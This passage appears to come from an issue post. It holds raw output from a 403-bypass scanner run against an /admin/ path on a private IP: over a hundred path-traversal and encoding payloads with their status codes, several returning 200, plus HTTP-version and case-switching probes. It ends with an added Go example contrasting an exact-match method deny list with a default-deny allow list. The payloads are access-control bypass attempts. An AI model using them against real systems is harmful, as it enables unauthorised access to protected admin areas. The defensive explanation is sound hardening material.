404 	  372 bytes http://172.16.67.124////..;//admin/
404 	  371 bytes http://172.16.67.124////..;admin/
404 	  376 bytes http://172.16.67.124//..;/..;/admin/
200 	 3427 bytes http://172.16.67.124///?anythingadmin/
403 	  372 bytes http://172.16.67.124////..//admin/
404 	  370 bytes http://172.16.67.124//;//admin/
404 	  370 bytes http://172.16.67.124//;xadmin/
404 	  371 bytes http://172.16.67.124///.;/admin/
404 	  370 bytes http://172.16.67.124//x//../admin/
404 	  374 bytes http://172.16.67.124//x/..;//admin/
404 	  373 bytes http://172.16.67.124/;%09..;admin/
404 	  372 bytes http://172.16.67.124/;%2f..admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f%2e%2e%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/;%2f%2e%2eadmin/
404 	  377 bytes http://172.16.67.124/;%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 	  375 bytes http://172.16.67.124/;%2f%2f/../admin/
404 	  370 bytes http://172.16.67.124//x/../;/admin/
404 	  376 bytes http://172.16.67.124//..;%2f..;%2fadmin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f/../admin/
404 	  377 bytes http://172.16.67.124/;%2f..//..%2fadmin/
404 	  377 bytes http://172.16.67.124/;%2f../%2f..%2fadmin/
403 	  372 bytes http://172.16.67.124//./admin/
404 	  376 bytes http://172.16.67.124/;%2f..//;/admin/
404 	  370 bytes http://172.16.67.124//x/;/../admin/
404 	  376 bytes http://172.16.67.124//x/;/..;/admin/
403 	  372 bytes http://172.16.67.124/////admin/
404 	  378 bytes http://172.16.67.124/;%2f../;/;/;admin/
404 	  375 bytes http://172.16.67.124/;%2f/%2f../admin/
404 	  370 bytes http://172.16.67.124///;/admin/
403 	  372 bytes http://172.16.67.124//.//admin/
404 	  378 bytes http://172.16.67.124//..;/;/..;/admin/
404 	  372 bytes http://172.16.67.124//..;//admin/
404 	  376 bytes http://172.16.67.124//..;//..;/admin/
404 	  372 bytes http://172.16.67.124////..;/admin/
404 	  370 bytes http://172.16.67.124//;/admin/
404 	  372 bytes http://172.16.67.124/;%09..admin/
403 	  372 bytes http://172.16.67.124//x/../admin/
404 	  371 bytes http://172.16.67.124//;x/admin/
404 	  374 bytes http://172.16.67.124//x//..;/admin/
404 	  374 bytes http://172.16.67.124//x/..;/admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f/..%2fadmin/
404 	  374 bytes http://172.16.67.124/;%2f..%2f/admin/
404 	  377 bytes http://172.16.67.124/;%2f..%2f..%2f%2fadmin/
403 	  372 bytes http://172.16.67.124//x/..//admin/
404 	  377 bytes http://172.16.67.124/;%2f..//;/;admin/
404 	  376 bytes http://172.16.67.124//x/..;/;/admin/
404 	  375 bytes http://172.16.67.124/;%2f..///admin/
404 	  377 bytes http://172.16.67.124/;%2f../%2f../admin/
404 	  377 bytes http://172.16.67.124/;%2f..//../admin/
404 	  376 bytes http://172.16.67.124/;%2f..;///admin/
404 	  376 bytes http://172.16.67.124/;%2f../;//admin/
404 	  377 bytes http://172.16.67.124/;%2f../;/;/admin/
404 	  376 bytes http://172.16.67.124/;%2f..///;admin/
404 	  375 bytes http://172.16.67.124/;%2f//..%2fadmin/
404 	  370 bytes http://172.16.67.124/;%09admin/
404 	  371 bytes http://172.16.67.124/;%09;admin/
404 	  377 bytes http://172.16.67.124/;%2f/;/..;/admin/
404 	  376 bytes http://172.16.67.124/;%2f/;/../admin/
404 	  377 bytes http://172.16.67.124/;%2f..;//;/admin/
404 	  377 bytes http://172.16.67.124/;%2f..;/;//admin/
404 	  376 bytes http://172.16.67.124/;%2f//..;/admin/
404 	  375 bytes http://172.16.67.124/;%2f//../admin/
404 	  381 bytes http://172.16.67.124//.randomstringadmin/
404 	  371 bytes http://172.16.67.124///..;admin/
404 	  372 bytes http://172.16.67.124/;/%2e%2eadmin/
404 	  378 bytes http://172.16.67.124/;%2f;/;/..;/admin/
404 	  371 bytes http://172.16.67.124//.;/admin/
404 	  374 bytes http://172.16.67.124//..;/;/admin/
404 	  376 bytes http://172.16.67.124/;%2f;//../admin/
404 	  374 bytes http://172.16.67.124/;/%2e%2e%2f%2fadmin/
404 	  374 bytes http://172.16.67.124/;/%2e%2e%2f/admin/
404 	  372 bytes http://172.16.67.124/;/%2e.admin/
404 	  369 bytes http://172.16.67.124/;admin/
404 	  372 bytes http://172.16.67.124/;/.%2eadmin/
404 	  375 bytes http://172.16.67.124/;/%2f%2f../admin/
404 	  375 bytes http://172.16.67.124/;/%2f/../admin/
404 	  375 bytes http://172.16.67.124/;/%2f/..%2fadmin/
403 	  372 bytes http://172.16.67.124/;/%2e%2e/admin/
200 	 3427 bytes http://172.16.67.124/???admin/
403 	  372 bytes http://172.16.67.124/;/../.;/../admin/
403 	  372 bytes http://172.16.67.124/;/..//admin/
200 	 3427 bytes http://172.16.67.124/??admin/
200 	 3427 bytes http://172.16.67.124/?admin/
400 	  392 bytes http://172.16.67.124/;/.././../admin/
400 	  392 bytes http://172.16.67.124/;/../../admin/
404 	  375 bytes http://172.16.67.124/;/../%2f/admin/
404 	  371 bytes http://172.16.67.124/;x;admin/
404 	  375 bytes http://172.16.67.124/;/..%2f//admin/
403 	  372 bytes http://172.16.67.124/;/../admin/
403 	  372 bytes http://172.16.67.124/;/../..//admin/
404 	  371 bytes http://172.16.67.124/;x/admin/
404 	  370 bytes http://172.16.67.124/;xadmin/
404 	  376 bytes http://172.16.67.124/;/..%2f..%2fadmin/
404 	  374 bytes http://172.16.67.124/;/..%2f/admin/
404 	  377 bytes http://172.16.67.124/;foo=bar/admin/
404 	  370 bytes http://172.16.67.124/;///../admin/
404 	  370 bytes http://172.16.67.124/;///..//admin/
404 	  372 bytes http://172.16.67.124/;///..admin/
404 	  372 bytes http://172.16.67.124/;//..admin/
403 	  372 bytes http://172.16.67.124/;//../../admin/
404 	  377 bytes http://172.16.67.124/;/.%2e/%2e%2e/%2fadmin/
404 	  373 bytes http://172.16.67.124/;/.;.admin/
404 	  373 bytes http://172.16.67.124/;/..;admin/
404 	  370 bytes http://172.16.67.124/;/../;/admin/
403 	  372 bytes http://172.16.67.124/;/../;/../admin/
404 	  373 bytes http://172.16.67.124/;/..%2fadmin/
403 	  372 bytes http://172.16.67.124/;/..///admin/
403 	  372 bytes http://172.16.67.124/;/..//../admin/
404 	  375 bytes http://172.16.67.124/;/..//%2fadmin/
403 	  372 bytes http://172.16.67.124/;/..//%2e%2e/admin/
404 	  377 bytes http://172.16.67.124/;/..%2f%2f../admin/
404 	  372 bytes http://172.16.67.124/;/..admin/
404 	  375 bytes http://172.16.67.124/;//%2f../admin/
404 	  374 bytes http://172.16.67.124/\..\.\admin/

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403 	  372 bytes HTTP/1.0
403 	  353 bytes HTTP/1.1
403 	  353 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
2024/03/19 01:59:49 parse "http://172.16.67.124admi%6E/": invalid URL escape "%6E"
 	    0 bytes http://172.16.67.124admi%6E/
2024/03/19 01:59:49 parse "http://172.16.67.124%61dmin/": invalid URL escape "%61"
 	    0 bytes http://172.16.67.124%61dmin/
2024/03/19 01:59:49 parse "http://172.16.67.124a%64min/": invalid URL escape "%64"
 	    0 bytes http://172.16.67.124a%64min/
2024/03/19 01:59:49 parse "http://172.16.67.124ad%6Din/": invalid URL escape "%6D"
 	    0 bytes http://172.16.67.124ad%6Din/
2024/03/19 01:59:49 parse "http://172.16.67.124adm%69n/": invalid URL escape "%69"
 	    0 bytes http://172.16.67.124adm%69n/
2024/03/19 01:59:49 Get "http://172.16.67.124admiN/": dial tcp: lookup 172.16.67.124admiN on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124admiN/
2024/03/19 01:59:49 Get "http://172.16.67.124admIn/": dial tcp: lookup 172.16.67.124admIn on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124admIn/
2024/03/19 01:59:49 Get "http://172.16.67.124aDmin/": dial tcp: lookup 172.16.67.124aDmin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124aDmin/
2024/03/19 01:59:49 Get "http://172.16.67.124Admin/": dial tcp: lookup 172.16.67.124Admin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124Admin/
2024/03/19 01:59:49 Get "http://172.16.67.124adMin/": dial tcp: lookup 172.16.67.124adMin on 8.8.8.8:53: no such host
 	    0 bytes http://172.16.67.124adMin/

Thanks in advance!
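
Why the .htaccess in this issue lets `PoST` through, and a default-deny alternative, as an added example that is not part of the original post or the project: the deny-list guard mirrors the exact-match method list from the .htaccess, and the allow-list guard refuses any method token it does not recognise before running an authorization check that does not depend on the method. The handler names and the backend stub (assumed to serve any spelling of GET or POST, as the 200 for `PoST` suggests) are constructed for this illustration.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// app stands in for the backend. Assumption: it serves the page for any
// spelling of GET or POST, as the 200 response for "PoST" in the post suggests.
var app = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
	switch strings.ToUpper(r.Method) {
	case "GET", "POST":
		w.WriteHeader(http.StatusOK)
	default:
		w.WriteHeader(http.StatusMethodNotAllowed)
	}
})

// DenyListGuard mirrors the .htaccess logic: 403 only when the method equals
// one of the listed names exactly; every other token reaches the backend.
func DenyListGuard(next http.Handler) http.Handler {
	denied := map[string]bool{"HEAD": true, "OPTIONS": true, "PATCH": true, "GET": true,
		"POST": true, "PUT": true, "DELETE": true, "TRACE": true}
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if denied[r.Method] {
			w.WriteHeader(http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// AllowListGuard is default-deny: unknown method tokens get 405, and the
// authorization check runs for every request that passes the method filter.
func AllowListGuard(allowed []string, authorized func(*http.Request) bool, next http.Handler) http.Handler {
	set := make(map[string]bool, len(allowed))
	for _, m := range allowed {
		set[m] = true
	}
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !set[r.Method] {
			w.Header().Set("Allow", strings.Join(allowed, ", "))
			w.WriteHeader(http.StatusMethodNotAllowed)
			return
		}
		if !authorized(r) {
			w.WriteHeader(http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// denyAll models "deny from all"; allowAll models an authorized caller.
func denyAll(*http.Request) bool  { return false }
func allowAll(*http.Request) bool { return true }

// Status sends one request with the given method token through h.
func Status(h http.Handler, method string) int {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(method, "/admin/index.php", nil))
	return rec.Code
}

func main() {
	weak := DenyListGuard(app)
	hardened := AllowListGuard([]string{"GET", "POST"}, denyAll, app)
	for _, m := range []string{"POST", "PoST", "GeT", "gEt"} {
		fmt.Printf("%-5s deny-list=%d allow-list=%d\n", m, Status(weak, m), Status(hardened, m))
	}
}
```

In the .htaccess itself, the same effect comes from removing the `<If>` wrapper so that `deny from all` applies whatever the method is.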
